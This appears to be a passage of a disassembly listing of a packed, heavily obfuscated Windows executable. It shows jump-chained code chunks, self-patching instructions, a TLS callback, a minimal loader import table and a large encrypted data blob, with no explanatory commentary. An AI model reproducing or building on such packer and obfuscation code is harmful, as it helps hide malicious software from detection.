sub_45C14C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_45C16C:				; CODE XREF: sub_44067C-37C1j
					; k2vbe3.d:0044697Aj
		push	edx
		push	esi
		push	7BFEFE1Bh
		pop	esi
		xor	esi, 1515EF2Fh
		jmp	loc_45957A
; END OF FUNCTION CHUNK	FOR sub_44067C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_382. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_45C180:				; CODE XREF: sub_44A0D7-4D42j
		jmp	loc_440128
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------

loc_45C185:				; CODE XREF: k2vbe3.d:loc_455EE3j
		rol	ecx, 9
		xor	ecx, 0FBF09561h
		or	ecx, 392829F4h
		add	ecx, 0D4D2DC5Dh
		call	sub_45BCF0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_310. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_45C1A0:				; CODE XREF: sub_4505F8+791Fj
		jmp	nullsub_454
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_45C1A5:				; CODE XREF: sub_44ED3C+4913j
		jmp	sub_449DA2
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------

loc_45C1AA:				; CODE XREF: k2vbe3.d:0044491Aj
		jmp	loc_458600
; ---------------------------------------------------------------------------

loc_45C1AF:				; CODE XREF: k2vbe3.d:0043C201j
		jnz	loc_453B21
; START	OF FUNCTION CHUNK FOR sub_43E360

loc_45C1B5:				; CODE XREF: sub_43E360+AE0Bj
		jmp	loc_441D39
; END OF FUNCTION CHUNK	FOR sub_43E360
; ---------------------------------------------------------------------------
		sub	eax, esi
		xchg	ebx, eax
		jmp	loc_453B13
; ---------------------------------------------------------------------------

locret_45C1C3:				; CODE XREF: k2vbe3.d:loc_43FAACj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_45C1C4:				; CODE XREF: sub_451759+Cj
		jmp	loc_459C7E
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE49

loc_45C1C9:				; CODE XREF: sub_43DE49+Dj
		jmp	nullsub_250
; END OF FUNCTION CHUNK	FOR sub_43DE49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FDAC

loc_45C1CE:				; CODE XREF: sub_44FDACj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	esi
		push	edx
		pop	esi
		jmp	loc_458F85
; END OF FUNCTION CHUNK	FOR sub_44FDAC
; ---------------------------------------------------------------------------
		ror	edx, 3
		xchg	esi, edx
		jmp	sub_43C418
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_45C1E4:				; CODE XREF: sub_450983:loc_43C62Bj
		mov	eax, 147A4491h
		call	sub_4553CC
		mov	ds:off_41E074, eax
		lea	eax, sub_45530F
		mov	byte ptr [eax],	0C3h
		jmp	loc_451059
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_45C202:				; CODE XREF: sub_454F9F:loc_43C9CBj
		ja	loc_445E5E
		xor	ecx, 442A04Ah
		or	ebp, 0E1A49540h
		jmp	loc_44E3E8
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45C219:				; CODE XREF: sub_45A323-EE93j
		mov	ebx, 307F5CBBh
		sbb	edx, eax
		jmp	loc_453CBB
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_45C225:				; CODE XREF: sub_441885:loc_45BCDEj
		jz	loc_44462D

loc_45C22B:				; CODE XREF: k2vbe3.d:0043CB6Aj
		jmp	loc_4433CD
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------

loc_45C230:				; CODE XREF: k2vbe3.d:0043CB70j
		shr	esi, 6

; =============== S U B	R O U T	I N E =======================================



sub_45C233	proc near		; CODE XREF: sub_45156D+14C7p

; FUNCTION CHUNK AT 00447439 SIZE 00000003 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_44367E
		mov	eax, 475BA966h
		push	eax
		mov	eax, edi
		jmp	loc_447439
sub_45C233	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45C249	proc near		; DATA XREF: sub_43FE0A+10463o
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		retn
sub_45C249	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_45C253:				; CODE XREF: sub_45B4A2+12j
		jmp	loc_43ED12
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_45C258:				; CODE XREF: sub_43FE0A+1252Bj
					; sub_43FE0A+12C53j
		push	offset loc_4419CF
		jmp	nullsub_456
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_45C262:				; CODE XREF: sub_44ED3C:loc_44D521j
		xchg	esi, [edx]
		rol	ebx, 9
		cdq
		cmp	eax, edx
		jmp	loc_451FBF
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45C26F:				; CODE XREF: sub_43F7AC:loc_448CBCj
		jnz	loc_455914
		jmp	loc_44245E
; END OF FUNCTION CHUNK	FOR sub_43F7AC

; =============== S U B	R O U T	I N E =======================================



sub_45C27A	proc near		; DATA XREF: sub_45914Fo

; FUNCTION CHUNK AT 00440DE1 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004517FD SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00451F23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455C07 SIZE 00000018 BYTES

		push	ebx
		push	2D848AA7h
		call	sub_441AE3

loc_45C285:				; CODE XREF: sub_444297+15078j
		jmp	loc_4517FD
sub_45C27A	endp

; ---------------------------------------------------------------------------

loc_45C28A:				; CODE XREF: k2vbe3.d:0043C360j
		js	loc_446FA1
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_45C290:				; CODE XREF: sub_454E83:loc_43C347j
		add	edx, 27122EF5h
		push	eax
		pushf
		push	0E530BB95h
		pop	eax
		jmp	loc_44E8AF
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_45C2A3:				; CODE XREF: sub_451EB7:loc_44A5E1j
		or	ecx, 0A8B3938Fh
		rol	ecx, 0Fh
		add	ecx, 320004FEh
		xor	edx, edx
		div	ecx
		push	offset sub_45AD42
		jmp	loc_44FAF6
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAEB

loc_45C2C0:				; CODE XREF: sub_45AAEB-BF99j
		cmp	eax, 57664ABFh
		jmp	loc_44A514
; END OF FUNCTION CHUNK	FOR sub_45AAEB
; ---------------------------------------------------------------------------
		mov	eax, 64A3F24h
		call	sub_43C82E
		push	edx
		push	0B7E4D264h
		jmp	loc_43DDB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C9E9

loc_45C2E0:				; CODE XREF: sub_43C9E9+1j
		push	5D20DBBCh
		pop	esi
		xor	esi, 0B8571FE2h
		add	esi, 943F835Dh
		and	esi, 28DDCFF3h
		jmp	loc_4447D5
; END OF FUNCTION CHUNK	FOR sub_43C9E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A40

loc_45C2FD:				; CODE XREF: sub_450A40+Aj
		jz	loc_4596F3
		jmp	loc_4578AE
; END OF FUNCTION CHUNK	FOR sub_450A40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_45C308:				; CODE XREF: sub_43C865+1ACC1j
		jz	loc_443A33
		mov	eax, [edx]
		jmp	loc_44503A
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_45C315:				; CODE XREF: sub_454AD4-7406j
		sub	al, 99h
		push	offset sub_43D0BA
		jmp	loc_45BF71
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454CAC

loc_45C321:				; CODE XREF: sub_454CAC:loc_44F4F3j
		push	offset loc_446FAB
		jmp	loc_441C40
; END OF FUNCTION CHUNK	FOR sub_454CAC
; ---------------------------------------------------------------------------

loc_45C32B:				; CODE XREF: k2vbe3.d:0044CD23j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BD5

loc_45C32C:				; CODE XREF: sub_444BD5:loc_444BDBj
		jnz	loc_43E805
		jmp	loc_450372
; END OF FUNCTION CHUNK	FOR sub_444BD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1A6

loc_45C337:				; CODE XREF: sub_44F1A6:loc_447DCEj
		sub	ebp, 40E01EF3h
		add	edi, eax
		jmp	loc_448744
; END OF FUNCTION CHUNK	FOR sub_44F1A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_45C344:				; CODE XREF: sub_43E135+17E08j
		and	edi, 0BE5F0EFAh
		test	ebp, ebx
		jmp	loc_454EA4
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541D3

loc_45C351:				; CODE XREF: sub_4541D3-85E3j
		shl	ebx, 6

loc_45C354:				; CODE XREF: sub_45512F:loc_45B8A4j
		push	5527C77Ah
		pop	eax
		add	eax, 59ED7ACFh
		xor	eax, 0A64CF51Fh
		add	eax, ebp
		add	eax, 0F6A648A2h
		jmp	loc_449625
; END OF FUNCTION CHUNK	FOR sub_4541D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44746F

loc_45C373:				; CODE XREF: sub_44746F+1j
		mov	ebp, esp
		add	esp, 0FFFFFFD8h
		mov	[ebp-20h], eax
		mov	eax, [ebp-20h]
		mov	[ebp-28h], eax
		push	offset sub_44DAA0
		jmp	nullsub_463
; END OF FUNCTION CHUNK	FOR sub_44746F
; ---------------------------------------------------------------------------

loc_45C38B:				; CODE XREF: k2vbe3.d:00455A94j
		jz	loc_43ED12

; =============== S U B	R O U T	I N E =======================================



sub_45C391	proc near		; CODE XREF: k2vbe3.d:0044FE4Dp

; FUNCTION CHUNK AT 00449FCB SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	loc_449FCB
sub_45C391	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		push	edx
		jmp	loc_45BCAA
; ---------------------------------------------------------------------------
aIRJIBA		db 'œÔˆ-ËìR½J¾¨',0Ah
		db 'b',9,'a*',0
		align 1000h
k2vbe3_d	ends

; Section 7. (virtual address 0005D000)
; Virtual size			: 00032000 ( 204800.)
; Section size in file		: 00032000 ( 204800.)
; Offset to raw	data for section: 0005D000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_3gijy9nr	segment	para public 'CODE' use32
		assume cs:_3gijy9nr
		;org 45D000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		db 0CCh
		db 0D0h, 5, 0
		align 8
		dd 0FFFFFFFFh, 5D03Ch, 5D0B4h, 5D108h, 0
		dd 0FFFFFFFFh, 5D0E8h, 5D104h, 5 dup(0)
		dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
		dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
		dd 694C6461h, 72617262h, 4179h,	65470000h, 6F725074h, 64644163h
		dd 73736572h, 0
		dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
		dd 6C6C416Ch, 636Fh, 69560000h,	61757472h, 6572466Ch, 65h
dword_45D0B4	dd 77E79F93h		; DATA XREF: _3gijy9nr:0048DBBCr
					; sub_48DFC2+28r
dword_45D0B8	dd 77E805D8h		; DATA XREF: sub_48DFC2+37r
dword_45D0BC	dd 77E7A5FDh		; DATA XREF: _3gijy9nr:loc_48D933r
					; sub_48DFC2+8Er
dword_45D0C0	dd 77E75CB5h		; DATA XREF: _3gijy9nr:0048A0CEo
					; _3gijy9nr:0048A4E2r ...
dword_45D0C4	dd 77E7980Ah, 77E79E34h, 5D04Ch, 5D060h, 5D070h, 5D084h
					; DATA XREF: sub_48E128+1Eo
		dd 5D094h, 5D0A4h, 0
		dd 72657375h, 642E3233h, 6C6Ch,	654D0000h, 67617373h, 786F4265h
		dd 41h
dword_45D104	dd 77D6ADD7h		; DATA XREF: sub_48E078+64r
		dd 5D0F4h, 0
TlsDirectory	dd 0
TlsEnd_ptr	dd 0
TlsIndex_ptr	dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex	dd 0			; DATA XREF: _3gijy9nr:TlsIndex_ptro
TlsCallbacks	dd offset TlsCallback_0	; DATA XREF: _3gijy9nr:TlsCallbacks_ptro
		dd 0
; ---------------------------------------------------------------------------
		push	esi
		push	ecx
		mov	esi, eax
		mov	ecx, edx
		sub	ecx, 4
		cld

loc_45D13E:				; CODE XREF: _3gijy9nr:0045D155j
		lodsb
		shr	al, 1
		cmp	al, 74h
		jnz	short loc_45D154
		mov	eax, [esi]
		bswap	eax
		add	eax, ecx
		mov	[esi], eax
		add	esi, 4
		sub	ecx, 4

loc_45D154:				; CODE XREF: _3gijy9nr:0045D144j
		dec	ecx
		jg	short loc_45D13E
		pop	ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------
		db 8Bh,	0C0h
off_45D15C	dd offset sub_401000	; DATA XREF: _3gijy9nr:0048CC48o
		dd 0D000434Ah, 1, 717E0000h, 0D62820D5h, 421CFFDh, 3D050191h
		dd 42988842h, 9C1F7FD5h, 5DE1BA29h, 95191221h, 0C780B0E7h
		dd 74126A29h, 4CA9CD3Ch, 0D8BF3E90h, 301D55EAh,	3ED489F8h
		dd 22037A11h, 0D5844924h, 59C57483h, 0DC28ABF5h, 514DF1ABh
		dd 9A10211Bh, 585AC6F3h, 0BF0176BCh, 60EC626Eh,	22BB2EC4h
		dd 4303BFC2h, 99318DA7h, 200EF280h, 41AA8806h, 0A0E8DB25h
		dd 0FADD2BB6h, 3ABC80B0h, 3BCC2C5Fh, 72823A78h,	96E19221h
		dd 442B1FA0h, 6199E340h, 46A941E6h, 80F867C5h, 7D312989h
		dd 0A47D52Ch, 0E3D18B57h, 0F22419DCh, 671AA310h, 100A428Ah
		dd 0F07B3E58h, 280D5D06h, 35341A09h, 4A8AA5CDh,	0CA9D8B28h
		dd 5EFB0A10h, 0D1E25AAEh, 3738089Ch, 0D32885FBh, 0E7412832h
		dd 0F09CC6AEh, 5CE08657h, 5277A87Eh, 0CB2F66C0h, 43BFDF2Dh
		dd 996A1813h, 811201CAh, 0CFDD454h, 2405D444h, 0DB097430h
		dd 4DF0A99Ch, 0C36EC0BAh, 597877F8h, 673105Ch, 852C27AEh
		dd 0C8218EDCh, 0C696F97Fh, 0CAB50D2h, 55EA42ABh, 0C19719FDh
		dd 323E3500h, 50D59452h, 0AE1D238Dh, 0C286FAF1h, 5F246EBBh
		dd 35D211C0h, 0BF098A1Fh, 0B8205783h, 368D4C94h, 227102A6h
		dd 3652046Ah, 14637688h, 0DFF91AB5h, 1690E63Ah,	0F1A35F06h
		dd 842839CDh, 3F397390h, 58229B8Ch, 0DA084B9Eh,	94DC2A95h
		dd 0EA5FD54Dh, 6D12F021h, 22D492B8h, 0E732FD43h, 23740406h
		dd 0A6F6B477h, 691F2198h, 0ED101D6h, 103536Dh, 0C2C94ED4h
		dd 2E076094h, 0EA876839h, 14815A29h, 0E8AC1C04h, 0B12DEB3Dh
		dd 0E905143Dh, 54F73262h, 2D050BC0h, 0B55C6A9h,	5E050E34h
		dd 2C47B18h, 3C1B66E9h,	2C0586E0h, 4676E481h, 737E6909h
		dd 0CEA16DB2h, 0BE3C8A28h, 91463372h, 298ED46h,	805D4312h
		dd 29CA3BE8h, 4F1B94A2h, 2C451925h, 70225682h, 3D3846BDh
		dd 2958BDA0h, 0FBE40391h, 0AA154440h, 0FA89EBA5h, 49A6337Ch
		dd 20C19EBDh, 5150D236h, 9BE0D2A0h, 0D4E35385h,	0FB2CADD7h
		dd 7C1CABADh, 69C2C828h, 51FE5894h, 83E08314h, 1369A4A5h
		dd 0D9A296E3h, 0AC18F169h, 61760515h, 83B46034h, 0B9C36896h
		dd 22829918h, 9A4D541Eh, 0B96A30A2h, 408D283Eh,	128B9114h
		dd 5199D234h, 0C340091h, 0A82C9DFEh, 1AC721C7h,	1985700Dh
		dd 0ABB347AEh, 813B5BF8h, 0CAD7B44Fh, 851DE3C6h, 4F20FEFDh
		dd 6342D140h, 230D8BAh,	878ED085h, 0D5CF0D2Ah, 87E11E88h
		dd 9CE2DE0Bh, 52D5F85Ah, 0FCF49704h, 0FA8741ACh, 4C7AB5EAh
		dd 6A4CB559h, 75B310E0h, 8A23FCABh, 9512902Fh, 21654D4Eh
		dd 61E78417h, 16179988h, 0F9C921BDh, 6CB9D062h,	19944D64h
		dd 2FF34337h, 9AC1EDF6h, 3E1E89BEh, 0BFF8C1B5h,	42C6743Ch
		dd 0D7259283h, 0AD502423h, 0ADFD99F4h, 0A9F130ACh, 37D9FE65h
		dd 94358C4Dh, 3BE1D1B6h, 96AF5529h, 56605CE1h, 0EF03F562h
		dd 214BD722h, 1A02C6CDh, 16E1935h, 49623615h, 0B953F656h
		dd 26CBFB1Eh, 314CDA6h,	0E318F028h, 98700061h, 10DCFE40h
		dd 94020440h, 58DC6FA2h, 6AA93C3Ch, 629F1483h, 70EBF5DFh
		dd 15404D1Fh, 115028EEh, 3B8528E3h, 0CB5B14D5h,	51F5BB39h
		dd 8DE217CFh, 2B979C7Eh, 6B336BEAh, 8F4678C3h, 6ED577E2h
		dd 0D21C2E9Ah, 0B1255595h, 98B0DC6Ah, 1163AA13h, 1C532A28h
		dd 4E4D6A10h, 0D6C14518h, 19A4D7F2h, 0F084C70Ch, 1551128Ch
		dd 0BB87B4DFh, 0F38FF5A6h, 0C5193208h, 24AFC8D1h, 583C10B2h
		dd 0B9D3F0A8h, 0D5908CDEh, 9250CAA5h, 3182873Dh, 0B8C5B5B3h
		dd 5128CE72h, 3C828D1Ah, 0C4FAFADh, 1B415171h, 3097F443h
		dd 0B0D45B9Ah, 0A2B4272h, 9252762Ch, 3E44760Dh,	9176290h
		dd 0C202EE98h, 2E036826h, 70900F13h, 659E5373h,	0DE178C19h
		dd 51598E4Dh, 2678332Bh, 41A58DABh, 0BFC4783Eh,	373294Fh
		dd 1242C7E2h, 0C872F5A9h, 3ED1051h, 6888ECFAh, 0BB8F4733h
		dd 688A4BDCh, 69712456h, 53F57316h, 0CC1C6431h,	0D5C1960Dh
		dd 0EA52F88Dh, 22090AA9h, 1460606Dh, 23073BA4h,	70C2F46Dh
		dd 3130C084h, 2D470419h, 4EC57039h, 4E3F28C5h, 30AA1E16h
		dd 0D9070C1Ah, 4CD60D00h, 0E0872AC3h, 38A2A1F0h, 5523E578h
		dd 0E6BD7C3Bh, 210871DFh, 0DE8938A4h, 80248274h, 0DA8B9E1h
		dd 0E7510E57h, 96B13D39h, 91541E3Ah, 8BD6343Ch,	0D32E7AA0h
		dd 0CE56AA63h, 1452CC31h, 50C0AAD1h, 7CFD1B8h, 0FA1A2257h
		dd 20786C4Ch, 4164BEC7h, 89C2BA2Ch, 7FF55241h, 3004CF3Fh
		dd 8BEFC862h, 330F9444h, 0A0416800h, 0DFB9C649h, 0FB7579BEh
		dd 16E3104Ch, 0A9D6C6Eh, 9DB8FE05h, 80E84311h, 0A3310108h
		dd 302E65E0h, 0EF043299h, 58889C56h, 0BB5AC6EFh, 0EB8D25E1h
		dd 0D6EE3801h, 0A10EDA83h, 1A84217Ch, 4180E92Eh, 0E65D2712h
		dd 0E7B0BEA9h, 230F21A5h, 2021A051h, 1052C275h,	15103249h
		dd 6EB103CBh, 4AE89D44h, 42028C27h, 50EC64DDh, 4A8272A2h
		dd 0CF93280h, 0F5C4810h, 5707A67Ch, 0B7D11636h,	7A0DD8FFh
		dd 9E060F29h, 0DCDB44h,	0D0300295h, 0B56CA47Eh,	7E14D059h
		dd 0DBF334DFh, 80EF81AAh, 0A2B72D00h, 1A0C5707h, 6040B60Dh
		dd 802A8E28h, 0C49E4672h, 0E0D53F90h, 4828252Bh, 6FF1B119h
		dd 898C3B04h, 24410B54h, 0E74C58FAh, 0E7081CC5h, 0F889244Ah
		dd 0CC9C634Bh, 0F40B6B2Eh, 65AD798Ch, 9A1E4862h, 39DA33FAh
		dd 118C4CB8h, 0D62AA71Bh, 37858282h, 809A8B08h,	8201B77Fh
		dd 2AC4196Ah, 72F965B5h, 0A331E4ECh, 1DAA4652h,	0FE37704Ch
		dd 0E15907BFh, 0BE7A546Fh, 802499F4h, 94B2653Bh, 9008B540h
		dd 0A2982380h, 0A04E1C04h, 8CCBB0A7h, 0D710C351h, 6092F72Fh
		dd 41D8E30Eh, 9484C04Dh, 0B1112459h, 0A4A0125h,	5ACEC9E6h
		dd 0C530024Bh, 5490613h, 94DFCE25h, 8354D941h, 6D86C123h
		dd 7688A62Dh, 0A8DBFAE4h, 0C78E401Ch, 41E387A0h, 732881ADh
		dd 67FC40D7h, 2D8DA73Bh, 0B8850DA7h, 9C9E4F97h,	6A229E32h
		dd 28BD404h, 0BF263762h, 37C9BD50h, 5013B619h, 88EE623Fh
		dd 0C15055A8h, 3C2A8C5Ah, 58D714CBh, 0C3081C4Ch, 1769962Ah
		dd 132A511h, 8AC6A235h,	6676909Eh, 5888055Eh, 0E5118F39h
		dd 68FC5818h, 0B52F42ADh, 76C72F4Ch, 4AA0AB8Bh,	0CA384A7Fh
		dd 140AED74h, 0C16381B9h, 0FFB81BACh, 0A3CF241h, 0D669412Dh
		dd 46E4B045h, 66E01504h, 5731317Ch, 87AE45C4h, 0AC5410C9h
		dd 0D906B57Ch, 4BACF175h, 0F18E0DB1h, 67D77141h, 34DD1583h
		dd 0C2381B35h, 45058FC5h, 5D28C3BFh, 86318143h,	85FBF3B6h
		dd 0C0B1149h, 0F6D95B5Bh, 18D5C25Bh, 10CA5296h,	21681942h
		dd 0DAD5F7AEh, 75BBC230h, 0D2039AFDh, 4D00F1C0h, 0D93057BEh
		dd 8AB67604h, 6D34439Fh, 18BA8108h, 5CA4CC47h, 8A510DFh
		dd 0AE3012B5h, 0E4156497h, 0E3BF7F68h, 0F9087532h, 254CC2DEh
		dd 56A4620h, 2CF6AF25h,	1FE5E1D2h, 1A648E83h, 14007FD7h
		dd 642502E8h, 0B772310h, 935E8404h, 234B51F2h, 6F886640h
		dd 46DEF200h, 12B48DC0h, 1898236Eh, 4D0F7D19h, 60492528h
		dd 0C3B4370Eh, 32C614h,	0B89A364Ah, 0CEE24CF8h,	0C9E82FF1h
		dd 0A7D0A6B1h, 0CE01AB7Fh, 229B853Ah, 0DF7D3E4Eh, 4B3ECC6h
		dd 386FBAB0h, 38DC13B4h, 664A6AAAh, 33EC2FB5h, 86A0A188h
		dd 0B75F73CBh, 0EF2858B1h, 2E5C60B6h, 7ADDB682h, 4E6F5B50h
		dd 8540D26Fh, 99046292h, 0C3762636h, 75E9A8BEh,	67D68964h
		dd 74C5C83Ch
		dd 8D30D507h, 0F5E9D37Fh, 0B60E4C2Bh, 0EF259F36h, 822634CCh
		dd 5A8AA8D4h, 0CC36D56Ch, 0ABB0A5A1h, 0F8A8FE8Ch, 1A635C6Bh
		dd 0A081438Dh, 4D3A40CEh, 1C1A2B4Dh, 6BDAD13Ch,	95E4B196h
		dd 0E4FC4834h, 0F688D307h, 49645ABFh, 0E8B09AA0h, 0C116D08Bh
		dd 708A0F44h, 72AAE262h, 23542080h, 90696D0Ch, 30B631A0h
		dd 630D23FAh, 2D0DC5DFh, 0D5353048h, 4B585698h,	8E38983h
		dd 0CAB9539h, 80CB8179h, 0A673AD92h, 0F278346Bh, 0D5D79700h
		dd 9CD3F21Eh, 824B8405h, 24921154h, 0BE460AE7h,	0C0BDE135h
		dd 6B2097B1h, 0D1D2B1DDh, 322C4B66h, 0E1872F74h, 85421E7Ah
		dd 2EDF430h, 12D0B185h,	0AA47414Bh, 5C23D317h, 40164310h
		dd 50041B8Ah, 0C78D812Ch, 0ADD06380h, 22B6938h,	3B3511E4h
		dd 0FDA236CEh, 14E3127Dh, 5FC33B42h, 82DAF4ECh,	0D3AD07C6h
		dd 5248A08Ah, 6EF53E0Bh, 508780DDh, 3C22EFEDh, 215A95F0h
		dd 0BCB3183Dh, 1B2A40D8h, 0C6F34BADh, 0E57E3A54h, 0B61F048Dh
		dd 0A2958B9Eh, 34C559E5h, 34CC35AFh, 2235E314h,	4AD84C35h
		dd 1299953Bh, 8B6324CAh, 0EA91F314h, 2D18FE5Ah,	58DCAB14h
		dd 849651B4h, 0F1508465h, 0E8622B80h, 68F45B71h, 0D242908h
		dd 46DC6DC5h, 8F8108D1h, 16185274h, 0DCE63C52h,	952DB186h
		dd 4600221Ah, 7053985Bh, 0E5F337Dh, 9A8F1943h, 8A24BB57h
		dd 32074588h, 0CD701134h, 0A28C2E21h, 933E6F96h, 3536290Eh
		dd 4EA1DAC5h, 4AA20685h, 1752C602h, 50144456h, 0AAA1AC0Dh
		dd 9A8C453Bh, 3F44A619h, 8AE33F5Ch, 16A969FAh, 9A13C205h
		dd 18F162CAh, 286935C4h, 4A916812h, 0DD4F9571h,	364BB966h
		dd 90AA9EACh, 0E88AEEDCh, 663C1890h, 0D524288Ah, 5425082Ah
		dd 0C50A81DAh, 7C5EC1F7h, 0BAA87A65h, 0F1BB6C18h, 31A60C72h
		dd 91E54925h, 5901A513h, 0D81ACBA1h, 0CB509E8Eh, 54C2A60h
		dd 38A16996h, 73A9F39Dh, 6162F144h, 15A606C4h, 4A421500h
		dd 84031617h, 0E0814179h, 27A90810h, 99EAE7C1h,	2EB2DC61h
		dd 0B40BEF61h, 5BA51678h, 2A719B63h, 65825D64h,	5C46BE88h
		dd 342A18BEh, 144AEF90h, 0E02CC071h, 8529A168h,	80ECB95h
		dd 8E59B637h, 4110D568h, 0B8B37ED4h, 2AB26AC2h,	0CB0B64B3h
		dd 0B38CC43h, 71A82B3Ch, 54E03091h, 0CF6DBEC0h,	0F26A3DF5h
		dd 14569AA6h, 596ACBD9h, 47A0C8B4h, 8F9A8106h, 0C1429E2Eh
		dd 295E2CA2h, 360FC282h, 447805D6h, 6B1A368Ah, 0F5C73E2Ah
		dd 1EFAFD14h, 0F7D0CCCh, 347B4B03h, 4145187Ah, 0C77BD76Bh
		dd 24B40AADh, 0F6879CE9h, 4B1F15E5h, 0A03EE33Ch, 0BDCF5688h
		dd 0A8DCE370h, 0DDBCEBDFh, 0D7B6CD57h, 0FD47C154h, 7B6BB3B9h
		dd 125780D9h, 0AF266BB4h, 103FC1A9h, 50BA80D4h,	0D768E62Dh
		dd 0CA77F51Fh, 5AC742F3h, 4863153Bh, 63B87504h,	102C7D44h
		dd 0E061F891h, 87908821h, 83B96A28h, 10530BC0h,	0F01B8A5Dh
		dd 10DF037Dh, 0A3C7690Bh, 4AFF05FCh, 1497AA61h,	7C2457A5h
		dd 4DFEDA34h, 0F1EA4688h, 4630223Ch, 0EBD0D16Bh, 0AB060E6Ah
		dd 0A0E2EFD6h, 0D14CE358h, 62968ED3h, 4A2FC295h, 2BE52740h
		dd 0C342BD15h, 2202E3E1h, 3AA0CBA8h, 25E11B82h,	35586AF0h
		dd 0FF014817h, 0A85E3E7Fh, 0D7763D24h, 0BF0111C4h, 900300D1h
		dd 6710CBEEh, 61A33408h, 0F961CA5Dh, 0F29A53E0h, 0E0A43810h
		dd 0E848F58Ch, 0E72CEA64h, 485602DEh, 4FCA8999h, 5B703584h
		dd 25092AADh, 463F5F85h, 221B3D7h, 0EA145382h, 7252F844h
		dd 4A46ED44h, 407A421h,	8220A112h, 0DED46A24h, 45D64F8Eh
		dd 14B587FFh, 98DC29E4h, 692BF265h, 0DB7A4B24h,	9BEEE315h
		dd 76D1E0B3h, 3D01B0C4h, 517EB48Fh, 3B9C6611h, 10B3BA29h
		dd 991E5DCEh, 0E70C605Fh, 4EC905FDh, 50155662h,	504C8368h
		dd 0EBB561B6h, 2D50DA7Ah, 0E6AB660Ch, 92853AD4h, 0CA0E1C04h
		dd 3E1BF717h, 4C092F84h, 0FBA80290h, 39534FC6h,	0A7611FA6h
		dd 0DEC23EDAh, 4BB87803h, 4AC0391Bh, 0E21F99C0h, 7EAD646h
		dd 0C1E3B701h, 0A7D472FDh, 3328102h, 83F50C98h,	0F1A9CC2h
